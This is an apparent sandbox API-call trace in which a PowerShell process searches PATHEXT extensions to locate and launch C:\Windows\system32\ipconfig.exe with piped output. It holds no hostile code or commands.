	[0213.508] SetErrorMode (uMode=0x1) returned 0x1
	[0213.508] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.psm1", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.523] SetErrorMode (uMode=0x1) returned 0x1
	[0213.525] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.525] SetErrorMode (uMode=0x1) returned 0x1
	[0213.526] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.psd1", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.757] SetErrorMode (uMode=0x1) returned 0x1
	[0213.759] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.759] SetErrorMode (uMode=0x1) returned 0x1
	[0213.759] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.COM", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.772] SetErrorMode (uMode=0x1) returned 0x1
	[0213.775] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.775] SetErrorMode (uMode=0x1) returned 0x1
	[0213.775] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.EXE", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.791] SetErrorMode (uMode=0x1) returned 0x1
	[0213.793] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.794] SetErrorMode (uMode=0x1) returned 0x1
	[0213.794] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.BAT", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.090] SetErrorMode (uMode=0x1) returned 0x1
	[0214.092] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0214.092] SetErrorMode (uMode=0x1) returned 0x1
	[0214.092] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.CMD", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.104] SetErrorMode (uMode=0x1) returned 0x1
	[0214.106] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0214.106] SetErrorMode (uMode=0x1) returned 0x1
	[0214.106] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.VBS", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.338] SetErrorMode (uMode=0x1) returned 0x1
	[0214.340] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0214.340] SetErrorMode (uMode=0x1) returned 0x1
	[0214.340] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.VBE", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.351] SetErrorMode (uMode=0x1) returned 0x1
	[0214.353] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0214.354] SetErrorMode (uMode=0x1) returned 0x1
	[0214.354] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.JS", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.367] SetErrorMode (uMode=0x1) returned 0x1
	[0214.368] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0214.369] SetErrorMode (uMode=0x1) returned 0x1
	[0214.369] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.JSE", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.539] SetErrorMode (uMode=0x1) returned 0x1
	[0214.540] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0214.541] SetErrorMode (uMode=0x1) returned 0x1
	[0214.541] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.WSF", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.551] SetErrorMode (uMode=0x1) returned 0x1
	[0214.553] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0214.553] SetErrorMode (uMode=0x1) returned 0x1
	[0214.553] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.WSH", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.564] SetErrorMode (uMode=0x1) returned 0x1
	[0214.565] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0214.565] SetErrorMode (uMode=0x1) returned 0x1
	[0214.565] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.MSC", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.576] SetErrorMode (uMode=0x1) returned 0x1
	[0214.578] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0214.578] SetErrorMode (uMode=0x1) returned 0x1
	[0214.578] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.746] SetErrorMode (uMode=0x1) returned 0x1
	[0214.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0214.749] SetErrorMode (uMode=0x1) returned 0x1
	[0214.750] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.ps1", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.750] SetErrorMode (uMode=0x1) returned 0x1
	[0214.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0214.751] SetErrorMode (uMode=0x1) returned 0x1
	[0214.751] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.psm1", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.751] SetErrorMode (uMode=0x1) returned 0x1
	[0214.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0214.752] SetErrorMode (uMode=0x1) returned 0x1
	[0214.752] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.psd1", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.752] SetErrorMode (uMode=0x1) returned 0x1
	[0214.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0214.753] SetErrorMode (uMode=0x1) returned 0x1
	[0214.753] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.COM", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0214.753] SetErrorMode (uMode=0x1) returned 0x1
	[0214.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0214.754] SetErrorMode (uMode=0x1) returned 0x1
	[0214.754] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.EXE", lpFindFileData=0x1c80ca20 | out: lpFindFileData=0x1c80ca20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a21ae5, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x89a21ae5, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xe460dc40, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipconfig.exe", cAlternateFileName="")) returned 0x1b811190
	[0214.756] FindNextFileW (in: hFindFile=0x1b811190, lpFindFileData=0x1c80ca30 | out: lpFindFileData=0x1c80ca30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a21ae5, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x89a21ae5, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xe460dc40, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipconfig.exe", cAlternateFileName="")) returned 0
	[0214.756] FindClose (in: hFindFile=0x1b811190 | out: hFindFile=0x1b811190) returned 1
	[0214.756] SetErrorMode (uMode=0x1) returned 0x1
	[0214.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\ipconfig.exe", nBufferLength=0x105, lpBuffer=0x1c80cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\ipconfig.exe", lpFilePart=0x0) returned 0x20
	[0214.757] SetErrorMode (uMode=0x1) returned 0x1
	[0214.757] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\ipconfig.exe" (normalized: "c:\\windows\\system32\\ipconfig.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c80cd50 | out: lpFileInformation=0x1c80cd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a21ae5, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x89a21ae5, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xe460dc40, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe400)) returned 1
	[0214.758] SetErrorMode (uMode=0x1) returned 0x1
	[0214.759] CoTaskMemAlloc (cb=0x104) returned 0x1b824740
	[0214.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b824740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0214.759] CoTaskMemFree (pv=0x1b824740) 
	[0214.761] CoTaskMemAlloc (cb=0x104) returned 0x1b824740
	[0214.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b824740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0214.762] CoTaskMemFree (pv=0x1b824740) 
	[0214.778] CoTaskMemAlloc (cb=0x104) returned 0x1b824740
	[0214.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b824740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0214.778] CoTaskMemFree (pv=0x1b824740) 
	[0215.175] CoTaskMemAlloc (cb=0x22) returned 0x1b81ebc0
	[0215.175] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\ipconfig.exe", dwFileAttributes=0x0, psfi=0x1c80cf38, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c80cf38) returned 0x4550
	[0215.425] CoTaskMemFree (pv=0x1b81ebc0) 
	[0215.429] GetConsoleWindow () returned 0x5026a
	[0215.468] CoTaskMemAlloc (cb=0x104) returned 0x1b824740
	[0215.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b824740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0215.468] CoTaskMemFree (pv=0x1b824740) 
	[0215.469] CoTaskMemAlloc (cb=0x104) returned 0x1b824740
	[0215.469] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b824740, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0215.470] CoTaskMemFree (pv=0x1b824740) 
	[0215.476] CoTaskMemAlloc (cb=0x104) returned 0x1b824740
	[0215.476] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b824740, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0215.476] CoTaskMemFree (pv=0x1b824740) 
	[0215.478] CommandLineToArgvW (in: lpCmdLine="", pNumArgs=0x1c80cf80 | out: pNumArgs=0x1c80cf80) returned 0x1b7d1b30*="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
	[0215.479] LocalFree (hMem=0x1b7d1b30) returned 0x0
	[0215.488] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0215.490] CreatePipe (in: hReadPipe=0x1c80cf00, hWritePipe=0x1c80cef8, lpPipeAttributes=0x1c80ced0, nSize=0x0 | out: hReadPipe=0x1c80cf00*=0x4d8, hWritePipe=0x1c80cef8*=0x4e0) returned 1
	[0215.490] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.490] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.491] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c80cf78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c80cf78*=0x4e8) returned 1
	[0215.491] CloseHandle (hObject=0x4d8) returned 1
	[0215.491] CreatePipe (in: hReadPipe=0x1c80cf00, hWritePipe=0x1c80cef8, lpPipeAttributes=0x1c80ced0, nSize=0x0 | out: hReadPipe=0x1c80cf00*=0x4d8, hWritePipe=0x1c80cef8*=0x4f0) returned 1
	[0215.492] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.492] GetCurrentProcess () returned 0xffffffffffffffff
	[0215.492] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c80cf78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c80cf78*=0x4f4) returned 1
	[0215.492] CloseHandle (hObject=0x4d8) returned 1
	[0215.493] CoTaskMemAlloc (cb=0x88) returned 0x1b7d1b30
	[0215.493] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\ipconfig.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c80cee0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x4e0, hStdError=0x4f0), lpProcessInformation=0x32624d8 | out: lpCommandLine="\"C:\\Windows\\system32\\ipconfig.exe\"", lpProcessInformation=0x32624d8*(hProcess=0x4f8, hThread=0x4d8, dwProcessId=0xc6c, dwThreadId=0xc70)) returned 1
	[0215.627] CoTaskMemFree (pv=0x1b7d1b30) 
	[0215.628] CloseHandle (hObject=0x4e0) returned 1
	[0215.628] CloseHandle (hObject=0x4f0) returned 1
	[0215.629] GetConsoleOutputCP () returned 0x1b5
	[0216.375] GetFileType (hFile=0x4e8) returned 0x3
	[0216.375] GetConsoleOutputCP () returned 0x1b5
	[0216.376] GetFileType (hFile=0x4f4) returned 0x3
	[0216.377] CloseHandle (hObject=0x4d8) returned 1
	[0216.378] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d8
	[0216.378] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4e0
	[0216.378] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x500
	[0216.378] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4fc
	[0217.126] SetEvent (hEvent=0x4d8) returned 1
	[0217.126] SetEvent (hEvent=0x4e0) returned 1
	[0217.150] SetEvent (hEvent=0x4d8) returned 1
	[0217.150] SetEvent (hEvent=0x4e0) returned 1
	[0217.154] SetEvent (hEvent=0x4e0) returned 1
	[0217.535] SetEvent (hEvent=0x4d8) returned 1
	[0217.535] SetEvent (hEvent=0x4e0) returned 1
	[0217.548] SetEvent (hEvent=0x4d8) returned 1
	[0217.548] SetEvent (hEvent=0x4e0) returned 1
	[0217.553] SetEvent (hEvent=0x4d8) returned 1
	[0217.553] SetEvent (hEvent=0x4e0) returned 1
	[0217.557] SetEvent (hEvent=0x4d8) returned 1
	[0217.557] SetEvent (hEvent=0x4e0) returned 1
	[0217.565] SetEvent (hEvent=0x4d8) returned 1
	[0217.566] SetEvent (hEvent=0x4e0) returned 1
	[0217.567] SetEvent (hEvent=0x4e0) returned 1
	[0218.015] SetEvent (hEvent=0x4e0) returned 1
	[0218.020] SetEvent (hEvent=0x4e0) returned 1
	[0218.026] SetEvent (hEvent=0x4d8) returned 1
	[0218.026] SetEvent (hEvent=0x4e0) returned 1
	[0218.029] SetEvent (hEvent=0x4d8) returned 1
	[0218.029] SetEvent (hEvent=0x4e0) returned 1
	[0218.029] SetEvent (hEvent=0x4e0) returned 1
	[0218.031] SetEvent (hEvent=0x4e0) returned 1
	[0218.033] SetEvent (hEvent=0x4e0) returned 1
